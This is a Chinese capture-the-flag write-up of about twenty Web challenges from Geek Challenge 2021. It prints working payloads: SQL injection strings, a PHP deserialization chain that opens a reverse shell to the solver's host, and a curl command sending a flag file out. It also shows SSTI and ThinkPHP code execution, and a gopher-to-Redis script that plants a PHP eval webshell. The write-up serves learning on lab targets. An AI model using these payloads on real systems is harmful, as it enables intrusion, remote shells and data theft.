WP篇之极客大挑战2021(部分Web)

WP篇之极客大挑战2021(部分Web)

又到了一年一度的极客大挑战了,去年作为新生的我被这比赛杀的稀烂,今年虽然自己依然很菜,但起码能多做几道题出来了,能看到自己一步步成长还是挺开心的,接下来我就把做出来的Web题的WP写一下,总共做出了20个web题,打了#号的就是还未做出的,希望大家一起交流学习

1.Dark

题目地址:http://c6h35nlkeoew5vzcpsacsidbip2ezotsnj6sywn7znkdtrbsqkexa7yd.onion/

这第一题居然出了一道暗网题我是没想到的,可能想让大家了解一下暗网,接触一些新东西?因为这个网址是onion结尾,一般的浏览器是访问不到的,我们得去下载专门的洋葱浏览器,如下图所示,然后安装好连接上就行了

image.png

image.png

2.Welcome2021

题目地址:http://1.14.102.22:8011/

这就是道常规题了,先用burp抓个包,放到重发器里面,发包

image.png

叫我们用WELCOME请求方法请求网页,关于请求方法大家就自行百度了哈,那我们就直接把GET改成WELCOME再发包

image.png

访问它就好了,成功拿下

image.png

3.babysql

题目地址:http://47.100.242.70:4339/index.php

一道比较简单的,没有过滤的联合过滤,这里有个坑点就是flag不在当前库中,所以说查询的时候要加上库名

正常页面:

image.png

错误页面:

image.png

然后在单引号后面加一个注释符就又恢复成正常页面了,基本上可以确定这里存在注入点了,那接下来就一套联合注入梭哈了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
判断列数:admin' order by 4 # 
正常
admin' order by 5 #
报错
列数为4列

判断回显位:admin ' and 0 union select 1,2,3,4 #
回显位为1和2

判断库名:admin' and 0 union select group_concat(schema_name),2,3,4 from information_schema.schemata#
库名为flag

判断表名:admin' and 0 union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema='flag'#
表名为fllag

判断列名:admin' and 0 union select group_concat(column_name),2,3,4 from information_schema.columns where table_schema='flag'#
列名为fllllllag

注数据拿flag:admin' and 0 union select group_concat(fllllllag),2,3,4 from flag.fllag#
flag:SYC{U_4N0vv_Sql_Noyv~}

image.png

4.babyPOP

题目地址:http://1.14.102.22:8114

一道PHP反序列化中pop链的构造问题,这道题比较恶心的是exec执行命令是无回显的,得把shell弹出来才行,源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
 <?php
class a {
public static $Do_u_like_JiaRan = false;
public static $Do_u_like_AFKL = false;
}

class b {
private $i_want_2_listen_2_MaoZhongDu;
public function __toString()
{
if (a::$Do_u_like_AFKL) {
return exec($this->i_want_2_listen_2_MaoZhongDu);
} else {
throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
}
}
}

class c {
public function __wakeup()
{
a::$Do_u_like_JiaRan = true;
}
}

class d {
public function __invoke()
{
a::$Do_u_like_AFKL = true;
return "关注嘉然," . $this->value;
}
}

class e {
public function __destruct()
{
if (a::$Do_u_like_JiaRan) {
($this->afkl)();
} else {
throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
}
}
}

if (isset($_GET['data'])) {
unserialize(base64_decode($_GET['data']));
} else {
highlight_file(__FILE__);
}

遇到POP链的问题肯定是先找链子的起点和终点,这里的起点是一个GET传参,然后会对它做一个unserialize操作,终点就在b类中的__toString()中,里面有一个exec函数可以执行命令;然后从终点往前跳,可以看到d类中的__invoke()方法里面有一个对象与字符串的拼接,可以调__toString();再往前看,e类中的__destruct函数里面的($this->afkl)()可以调__invoke;然后在对象销毁时会自动调用__destruct(),这样一条链子就成型了,我们开始写exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
class b {
private $i_want_2_listen_2_MaoZhongDu;
public function __construct()
{
$this->i_want_2_listen_2_MaoZhongDu="bash -c 'bash -i >& /dev/tcp/yourip/port 0>&1'";
}
}
class c {
}
class d {
public $value;
public function __construct()
{
$this->value=new b();
}
}
class e {
public $afkl;
public $a;
public function __construct()
{
$this->a=new c();
$this->afkl=new d();
}
}
$ars=new e();
echo base64_encode(serialize($ars));

这道题可能有点疑惑的地方就是它链子的起点并不是从__wakeup()开始的,而是直接从__desctruct()开始的,而将c类连进来仅仅是为了给$Do_u_like_JiaRan赋值,让它为true就行,然后用跑出来的结果直接打就行,别忘了在服务器上监听端口

image.png

5.where_is_my_FUMO

题目地址:http://1.14.102.22:8115/

一道很有意思的反弹shell的题,先反弹shell然后想办法把图片利用curl上传到自己的服务器上

关于反弹shell可以先看看这篇文章:https://xz.aliyun.com/t/2549

首先看看题目源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 <?php
function chijou_kega_no_junnka($str) {
$black_list = [">", ";", "|", "{", "}", "/", " "];
return str_replace($black_list, "", $str);
}

if (isset($_GET['DATA'])) {
$data = $_GET['DATA'];
$addr = chijou_kega_no_junnka($data['ADDR']);
$port = chijou_kega_no_junnka($data['PORT']);
exec("bash -c \"bash -i < /dev/tcp/$addr/$port\"");
} else {
highlight_file(__FILE__);
}

可以看出,当我们以数组的形式输入ip地址和端口之后,它就可以直接反弹shell了

image.png

就像这样传入参数,然后在服务器那边监听端口,就会发现shell已经反弹过去了,但这里有一个坑点,如下图:

image.png

这个反弹shell的命令乍一看没啥问题,但它把大于号改成了小于号,也就是说它将输出重定向到了它的服务器而不是我们的服务器,那么这个命令虽然被执行了,但输出是在它的服务器上,我们是看不到回显的,这时候我们该怎么办呢?再进行一遍正常的弹shell!!让它把命令执行的结果重定向到我们的服务器上,才能看到回显的,如下图所示:

image.png

这样我们就可以正常执行命令而且可以看到回显啦,那么现在问题又来了,虽然说可以看到回显,但flag是在根目录下而且是一张图片,flag.png,我们在命令行肯定是没有办法直接看图片的,得想个办法把这个图片传输出来,传输到我们自己得服务器上,然后再通过我们自己的服务器把图片下载到本地,才能看到,还好,它没有ban掉curl,那我们就可以通过curl来传输了

image.png

具体的传输方法请看这篇文章:https://blog.csdn.net/bjbs_270/article/details/710833122,打极客大挑战就是一个不断学习的过程,可以从中学到很多很多有意思的新东西哈哈哈

这篇文章的大概意思就是在接收端新建一个php文件,源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
//highlight_file(__FILE__);
$uploaddir = '/var/www/html/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

echo '<pre>';
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "Possible file upload attack!\n";
}

echo 'Here is some more debugging info:';
print_r($_FILES);

print "</pre>";

?>

我把它放到了docker里面,命名为upload.php,然后在shell里面执行curl -F "userfile=@/flag.png" http://youip/upload.php就成功的把flag.png上传到我的docker里面了,那我们直接访问就可以看到了:

image.png

6.babyphp

题目地址:http://47.100.242.70:4659/

一道比较简单的ssrf,用file://伪协议去读取文件

首先进去之后f12查看源代码,找到一句注释 why not read robots?,那我们就先查看robots.txt,发现里面有一句/noobcurl.php,那就直接访问它了,看到了源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
function ssrf_me($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
}

if(isset($_GET['url'])){
ssrf_me($_GET['url']);
}
else{
highlight_file(__FILE__);
echo "<!-- 有没有一种可能,flag在根目录 -->";
}

明显是一个ssrf,然后还告诉了我们flag在根目录下,那就直接用file:///flag读取它就完了,直接拿下

image.png

7.babyPy

题目地址:http://1.14.102.22:8124/

一道pythonflask模板的ssti注入,没有过滤,挺简单的

我们先在title那里输入{{1+1}}测试它是否存在ssti,结果它在标题那里直接返回了2,说明是存在的,那直接用payload去打就行了,payload如下:

1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('o'+'s').popen('在这里输命令').read()") }}{% endif %}{% endfor %}

输命令的地方直接cat /flag就可以了

image.png

8.蜜雪冰城甜蜜蜜

题目地址:http://106.55.154.252:8083

这道题是我觉得这期极客大挑战中最无聊的一道题,不知道出题人想考什么,js中给了一堆迷惑条件;刚开始我想的是伪造签名,把rsa解出来,就耽搁了很多时间,后面发现不太行,原来是在前端直接改id,把id改成9然后再点它就可以点出第九杯奶茶了

image.png

image.png

9.雷克雅未克

题目地址:http://106.55.154.252:1209

一道挺简单的伪造XFF头,这题前端做的是真挺酷炫的哈哈哈

首先用它给出的ip放入它给的网站中查询,查出经纬度为:

image.png

然后抓check.php的包,修改经纬度以及XFF头

image.png

得到JsFuck编码,直接在浏览器控制台运行就行

image.png

10.人民艺术家

题目地址:http://106.55.154.252:2019/

一道JWT伪造的题,需要先构造出密钥然后伪造出JWT,再给它传回去就行

首先进去之后用户名账号随便输,它就会告诉我们真账号

image.png

然后输入真账号之后抓包,可以看到JWT为:

1
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0aW1lIjoiMjAyMSIsIm5hbWUiOiJmYWtlX2FkbWluIn0.rclssTrPKaSGoIPJZ0RxKIb1h_DDTtxzHQIQ0Vlbj7g

先用爆破的工具:jwtcrack爆破密钥,爆破出来为1234:

image.png

然后放到JWT的解密网站:https://jwt.io/ 解密,把time改为2019,把name改为admin,密钥1234填上

image.png

然后把这个JWT在burp中给它传回去就行了,就在headers处传就行

image.png

访问那个php文件,得到flag:SYC{X1a0_Ch0u_hello_Why_S0_Ser10us}

11.babyxss

题目地址:http://cat.simpfun.cn:2333/

一道挺简单的xss,只要我们构造出闭合弹个1出来就可以了

1
2
3
<script>
function check(input){input = input.replace(/alert/,'');return '<script>console.log("'+input+'");</script>';}
</script>

前面有个('那我们给他个')闭合,后面有个'),来个('闭合就行了,然后前面有<script>标签,所以说要来个</script>来闭合,而最后有一个</script>,所以说前面要加一个<script>

然后中间就是一个常规的<script>alert(1)</script>,由于它把alert替换为空,所以说我们需要双写绕过,用alealertrt就行

最终payload为:')</script><script>alealertrt(1)</script><script>('

image.png

把单引号改成双引号也行哈,都能弹哈哈哈

12.Baby_PHP_Black_Magic_Enlightenment

题目地址:http://tc.rigelx.top:8003/

一道php黑魔法的题,考的一些php语言的特性,不算很难但是是真的套娃,套了不知道多少层哈哈哈,先看第一层:

1
2
3
4
5
6
7
8
9
10
11
12
13
 <?php
echo "PHP is the best Language <br/>";
echo "Have you ever heard about PHP Black Magic<br/>";
error_reporting(0);
$temp = $_GET['password'];
is_numeric($temp)?die("no numeric"):NULL;
if($temp>1336){
echo file_get_contents('./2.php');
echo "How's that possible";
}
highlight_file(__FILE__);
//Art is long, but life is short.
?>

先看第一层,让我们GET传进去一个参数,不能是纯数字而且大小要大于1336,那我们随便传一串大于1336的数字最后加几个字母就行了,比如说像9999abc;或者直接用数组绕过也行,比如password[]=1,这样就进入了下一层:baby_magic.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
 <?php
error_reporting(0);

$flag=getenv('flag');
if (isset($_GET['name']) and isset($_GET['password']))
{
if ($_GET['name'] == $_GET['password'])
echo '<p>Your password can not be your name!</p>';
else if (sha1($_GET['name']) === sha1($_GET['password']))
die('Flag: '.$flag);
else
echo '<p>Invalid password.</p>';
}
else
echo '<p>Login first!</p>';
highlight_file(__FILE__);
?>

一个sha1的强碰撞,但没有禁掉数组,那就数组直接梭哈了:name[]=1&password[]=2,得到结果baby_revenge.php,继续访问:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
error_reporting(0);

$flag=getenv('fllag');
if (isset($_GET['name']) and isset($_GET['password']))
{
if ($_GET['name'] == $_GET['password'])
echo '<p>Your password can not be your name!</p>';
else if(is_array($_GET['name']) || is_array($_GET['password']))
die('There is no way you can sneak me, young man!');
else if (sha1($_GET['name']) === sha1($_GET['password'])){
echo "Hanzo:It is impossible only the tribe of Shimada can controle the dragon<br/>";
die('Genji:We will see again Hanzo'.$flag.'<br/>');
}
else
echo '<p>Invalid password.</p>';
}else
echo '<p>Login first!</p>';
highlight_file(__FILE__);
?>

来了个升级版,禁掉了数组,呵呵,那就直接用sha1强碰撞的payload去打嘛,只不过这payload比较长:

1
name=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&password=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

得到了here_s_the_flag.php,继续访问嘛:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
 <?php
$flag=getenv('flllllllllag');
if(strstr("hackerDJ",$_GET['id'])) {
echo("<p>not allowed!</p>");
exit();
}

$_GET['id'] = urldecode($_GET['id']);
if($_GET['id'] === "hackerDJ")
{
echo "<p>Access granted!</p>";
echo "<p>flag: $flag </p>";
}
highlight_file(__FILE__);
?>

这一层挺简单的,把hackerDJurl两次编码就行了,或者只编一个字母也行,用GET传一个id=%25%36%38ackerDJ就行

image.png

终于出flag了哈哈哈

13.easyPOP

题目地址:http://1.14.102.22:8002/

这道题是NoVic4给我的exp,我也还没完全研究透,主要是我没搞懂这数组是什么个操作,先放上吧,供师傅们研究:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<?php 
class d {
public $value;

public function __construct(){
$this->value="system";
}
}

abstract class b {
private $b;

public function __construct(){
$this->b=[$this,'eval'];
}
}

class c extends b{
private $call;
protected $value;

public function a(){
$this->call=[new d(),'eval'];
$x=new d();
$x->value="cat /flag";
$this->value=[$x,"eval"];
}
}

class a {
public $test;

public function __construct(){
$this->test;
}
}

$a=new a();
$c=new c();
$c->a();
$a->test=$c;
echo base64_encode(serialize($a));

14.期末不挂科就算成功

题目地址:http://106.55.154.252:8010

挺离谱的一道题,感觉题目交代的很不清楚,刚开始不知道题目想干什么,后面听别人说就是一个简单的SSRF实现一个POST传参

首先进去之后f12,找到了一个debug.php,访问它发现是一个文件包含,先用伪协议读出index.phpdebug.php的源码

index.php

1
2
3
4
5
6
7
8
9
10
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch);
curl_close($ch);
//你当前位于学校172.17.0.0/24网段下 其实还有台机子里面可以修改成绩 我偷偷告诉你password是123456,name是admin,//result必须要改成60 不然学校会查的!!!
?>

debug.php

1
2
3
4
5
6
7
8
9
10
11
12
13

<?php

echo "<h1>快去学习PHP伪协议</h1>";
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "NO!!!";
exit();
}
include($file);

?>

明显是一个SSRF,并且告诉了我们网段是:172.17.0.0,那我们就先扫一扫看看管理员的地址是什么,扫出来是172.17.0.7

image.png

然后在这我就卡了很久,不知道他想让我们用SSRF,刚开始我想的是它告诉了我们usernamepassword,那我们可以给它传进去,但我怎么都没想到他提示中的result必须要改成60的意思是传一个result=60,真就离谱,那这样就简单了呀,直接向管理员页面传一个username=admin&password=123456&result=60,用gopher实现POST传参就行了,接下来来构造gopherpayload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import urllib.parse

POST="""
POST /index.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

password=123456&name=admin&result=60
"""
tmp=urllib.parse.quote(POST)
new = tmp.replace('%0A','%0D%0A')
payload ='gopher://172.17.0.7:80/_'+urllib.parse.quote(new)
print(payload)

就这样了,直接去打就行:

image.png

15.成全

题目地址:http://106.55.154.252:500/public/

一道Thinkphp框架题,有点意思的是由于这里加了disable_functions,导致网上的那些payload都不太能打得通,得自己研究研究

上来肯定还是先随便乱输点东西,看看它的报错是什么,来找找版本号:

image.png

看了看版本号为5.0.12,那么先按照网上的payloadphpinfo打出来:

1
2
GET:     /public/index.php?s=index
POST: _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo

image.png

发现可以拿来命令执行的函数全被ban了,很难顶,看来只能考虑代码执行了,先看看/etc/passwd能不能行

image.png

发现是没有问题的,但出题人肯定不会傻到把flag放在根目录下名字就为flag,所以说得想办法遍历目录;我们可以发现之所以这里能执行命令是因为有call_user_func,它会将第一个参数作为回调函数,第二个参数作为参数执行,那我们能不能想办法执行像var_dump(scandir(/))这种套娃型的呢,那我们就得往上面去看foreach了,既然他接收的是一个数组,那我们假如传入多个值呢,比如说看看下面这段代码,肯定它是可以执行的:

1
2
3
4
<?php
$b = call_user_func('scandir','../');
call_user_func('var_dump',$b);
?>

那么既然如此,我们就先传入一个filter[]=scandir&get[]=/,那么现在的$value就是call_user_func('scandir','/');了,这时候再来一个filter[]=var_dumpforeach$filter的值覆盖为var_dump,那么就是:

call_user_func(var_dump, call_user_func('scandir','/'));,这种毫无疑问是可以的,所以说我们最终的payload为:

1
_method=__construct&method=get&filter[]=scandir&get[]=/&filter[]=var_dump

image.png

找到flag的名字,直接读取它拿下:

image.png

16.anothersql

题目地址:http://47.100.242.70:4003/

一道sql注入题,过滤不算太多,但对于我这种python脚本不算太强的人来说还是有点麻烦,用burp慢慢爆出来的

注入点依然是在uname这里,admin'报错,admin'#正常,明显这里存在注入,那我们先fuzz一下他过滤了些什么:

image.png

不算很多,但过滤掉了< > substr mid if还是很烦的,还好都有相类似的可以代替,影响还不算很大哈哈哈,比较恶心的就是只能用left函数,每爆出一位还得先加上这一位然后去修改长度,就显得很麻烦,就是因为这个原因我都没写脚本,直接用的burp

1
2
3
4
5
6
7
8
9
10
11
爆出数据库长度:admin' and length(database())=§4§ #  爆出来是12位
爆数据库:admin' and left(database(),12)='true____fla§1§'# 爆出数据库名位true____flag
然后利用count爆出数据表只有一个,然后开始爆表名:
admin' and left((select table_name from information_schema.tables where table_schema=database()),9)='syclover§a§'#
爆出数据表名为:syclover,然后开始爆列数:
admin' and (select count(column_name) from information_schema.columns where table_name='syclover')=§4§#
爆出总共有4列,接下来开始爆列名:
admin' and left((select column_name from information_schema.columns where table_name='syclover'limit 0,1),1)='§i§'#
前三列没什么用,分别为if uname pwd,第四列为flag,我们就只爆flag就行:
admin' and left((select flag from syclover limit 0,1),28)='SYC{U_4N0VV_3RR0R_INJ3C410N§a§'#
成功爆出flag为:SYC{U_4N0VV_3RR0R_INJ3C410N}

image.png

当我看到}了的时候我就知道已经大功告成了哈哈,不过看这个flag的内容猜这个题的考点应该是报错注入而不是盲注,看来还解了个非预期哈哈哈,但我看到extractvalueupdatexml都被过了之后我就没往这方面想了,这道题应该用floor,害看来还是题做少了,太菜了

17.givemeyourlove

题目链接:http://1.14.71.112:44423

一道挺有意思的ssrf打redis的题,和之前的题不太一样的是这里的redis并不是未授权访问,而是存在密码的,我们不能像以前一样用Gopherus生成payload直接打了,而是得用一个新方法,先看源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
// I hear her lucky number is 123123
highlight_file(__FILE__);
$ch = curl_init();
$url=$_GET['url'];
if(preg_match("/^https|dict|file:/is",$url))
{
echo 'NO NO HACKING!!';
die();
}
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
?>

刚开始的时候告诉我们她的幸运数字是123123,因为这数字不可能是端口号,那我们就盲猜它是redis的密码了,然后这题有一些过滤,挺恶心的,不能用file协议访问本地的文件,也不能用dict协议访问端口,但它没有禁掉gopher,那就直接用gopher打就行了

关于ssrf的原理啥的可以先看看这篇文章:https://www.sqlsec.com/2021/05/ssrf.html

这里的redis虽然有密码,但其实原理是一样的,都是抓取出需要的数据包,然后处理成符合gopher协议的方式,然后利用gopher协议发起攻击,只不过这里有密码,前面需要加一步auth 123123而已,具体的构造见这篇文章:https://xz.aliyun.com/t/5665#toc-4

那里面把脚本都给好了,我们稍微处理一下就可以使用,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/python3
import urllib.parse
protocol="gopher://"
ip="127.0.0.1"
port="6379"
shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
filename="1.php"
path="/var/www/html"
passwd="123123"
cmd=["flushall",
"set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd

if __name__=="__main__":
for x in cmd:
payload += urllib.parse.quote(redis_format(x))
print(payload)

跑一下结果为:

1
gopher://127.0.0.1:6379/_%2A2%0D%0A%244%0D%0AAUTH%0D%0A%246%0D%0A123123%0D%0A%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%245%0D%0A1.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

burp中再次将它url编码之后打进去:

image.png

然后直接访问1.php,可以发现已经成功写进去了,那就直接执行命令拿下了:

image.png

#18.easyPy

题目地址:http://1.14.102.22:5000/

image.png

19.easysql

题目地址:http://47.100.242.70:4725/index.php

又是一道sql,这道sql是真正的盲注了哈哈哈,而且它的过滤挺狠的,注释符都被过了害得我搞了好久才闭合,还好它留了一个mid

首先还是看看它过滤掉了些啥:

image.png

过滤的东西是真的多,主要是空格、注释符被过滤掉了,空格用()代替,注释符被过了就用单引号构造闭合就行,没有了and^这些就用or来代替,接下来就开始构造payload了:admin'or(1=1)='1,这样显示正确页面,而admin'or(1=1)='2显示错误页面,差不多就稳了,接下来我们来爆个数据库的长度:admin'or(length(database()))='7,爆出数据库长度为7,接下来我懒得爆数据库名了,直接用database()代替好了,那就开始爆表名,payloadadmin'or(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),1,1))='1

直接用burp,两个位置一起爆:

image.png

成功爆出数据表名为syclover,然后题目中的hint告诉了我们flagpwd中,相当于列名就是pwd,都懒得爆了,直接爆flag

admin'or(mid((select(group_concat(pwd))from(syclover)),§7§,1))='§1§

image.png

flag就出来了,就是比较费眼睛:SYC{U_@r3_G0oD_2t_SQLInj4ct10n}

#20.noobPHP

题目地址:http://110.42.233.91:250/

21.SoEzUnser

题目地址:http://ctf.rigelx.top/unserbucket/

一道首先利用PHP标准库中内置的类读取文件,然后利用SoapClient类 +CRLF发起POST请求,结合SSRF攻击内网的题,这道题应该是我做出来的题中最难的一道了,基本上都是现学的新知识,现学现用把它做出来的,先看源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
 <?php

class fxxk{
public $par0;
public $par1;
public $par2;
public $par3;
public $kelasi;

public function __construct($par0,$par1,$par2,$par3){
$this -> par0 = $par0;
$this -> par1 = $par1;
$this -> par2 = $par2;
$this -> par3 = $par3;
}
public function newOne(){
$this -> kelasi = new $this -> par0($this -> par1,$this -> par2);
}

public function wuhu(){
echo('syclover !'.$this -> kelasi.' yyds');
}

public function qifei(){
//$ser = serialize($this -> kelasi);
//$unser = unserialize($ser);
$this -> kelasi -> juts_a_function();
}

public function __destruct(){
if(!empty($this -> par0) && (isset($this -> par1) || isset($this -> par2))){
$this -> newOne();
if($this -> par3 == 'unser'){
$this -> qifei();
}
else{
$this -> wuhu();
}
}
}

public function __wakeup(){
@include_once($this -> par2.'hint.php');
}
}
highlight_file(__FILE__);
$hack = $_GET['hack'];
unserialize($hack);

首先看到__wakeup()中包含了hint.php,前面的$this -> par2可控,那我们先利用伪协议把文件内容读取出来,exp如下:

1
2
3
4
5
6
7
<?php
class fxxk{
public $par2 = 'php://filter/read=convert.base64-encode/resource=';
}
$a = new fxxk();
echo serialize($a);
?>

跑一下,结果如下:

1
O:4:"fxxk":1:{s:4:"par2";s:49:"php://filter/read=convert.base64-encode/resource=";}

直接去打,得到hint.php的内容,内容为:

1
2
3
4
5
<?php

$hint = '向管理员的页面post一个参数message(告诉他,"iwantflag") 和 另一个参数 url(它会向这个url发送一个flag';
$hint .= '管理员的页面在当前目录下一个特殊文件夹里';
$hint .= '但是我不知道(你也猜不到的)文件夹名称和管理员页面的名称,更坏的消息是只能从127.0.0.1去访问,你能想个办法去看看(别扫 扫不出来!!!)';

可以看到是让我们想管理员的页面发起一个POST请求,然后它把flag给我们弹回来,但管理员的页面是没有告诉我们的,只告诉我们是在当前目录下的一个特殊文件夹里,所以说我们要先把管理员的页面找出来;这道题就和DASCTF三月赛的ez_serialize很像了,可以先去看看mochu师傅的文章:https://blog.csdn.net/mochu7777777/article/details/115276176

这里需要用到PHP标准库下的内置类了,里面是有能够进行文件处理和遍历目录的类的:https://www.php.net/manual/zh/book.spl.php

image.png

比如说像FilesystemIterator类,就可以遍历目录,就先创建一个 FilesystemIterator类的对象,里面的参数就是我们想遍历的目录,然后将这个对象echo出来就可以看到了,我们先去源码中找找,看有没有我们可控的,可以看到,在newOne()方法中,正好有创建对象,而且类名和参数我们都可控,然后在wuhu()方法中做了输出,这就很舒服了呀,我们用./代表当前目录,exp如下:

1
2
3
4
5
6
7
8
9
10
<?php
class fxxk{
public $par0 = 'FilesystemIterator';
public $par1 = './';
}
$a = new fxxk();
echo serialize($a);
?>

//O:4:"fxxk":2:{s:4:"par0";s:18:"FilesystemIterator";s:4:"par1";s:2:"./";}

image.png

可以看到输出为aaaaaaaaaaafxadwagaefae,说明还有一层目录,继续来:

1
2
3
4
5
6
7
8
9
10
<?php
class fxxk{
public $par0 = 'FilesystemIterator';
public $par1 = './aaaaaaaaaaafxadwagaefae';
}
$a = new fxxk();
echo serialize($a);
?>

//O:4:"fxxk":2:{s:4:"par0";s:18:"FilesystemIterator";s:4:"par1";s:25:"./aaaaaaaaaaafxadwagaefae";}

image.png

可以看到php文件为UcantGuess.php,那这样完整的路径就出来了,为127.0.0.1/unserbucket/aaaaaaaaaaafxadwagaefae/UcantGuess.php

然后我们看回hint中,要让我们向这个页面要发起请求,那肯定得想办法SSRF了,然后还让我们POST一个参数进去,那就得结合CRLF控制数据包了,只要利用PHP中的SoapClient类,就可以发送soap请求了

这里我们参考这篇文章:https://blog.csdn.net/qq_42181428/article/details/100569464

文章里面讲的很清楚,SoapClient类中的构造函数为:public SoapClient :: SoapClient (mixed $wsdl [,array $options ])第一个参数$wsdl用来指明是否是wsdl模式,第二个参数$options需要的是一个数组,其中有locationurilocation是要将请求发送到的SOAP服务器的URL地址,而uriSOAP服务的目标命名空间,而它里面有一个选项是user_agent,可以运行我们自己的User-Agent的值,那我们再借助CRLF就可以实现控制数据包了,CRLF的文章:https://wooyun.js.org/drops/CRLF%20Injection%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E4%B8%8E%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90.html

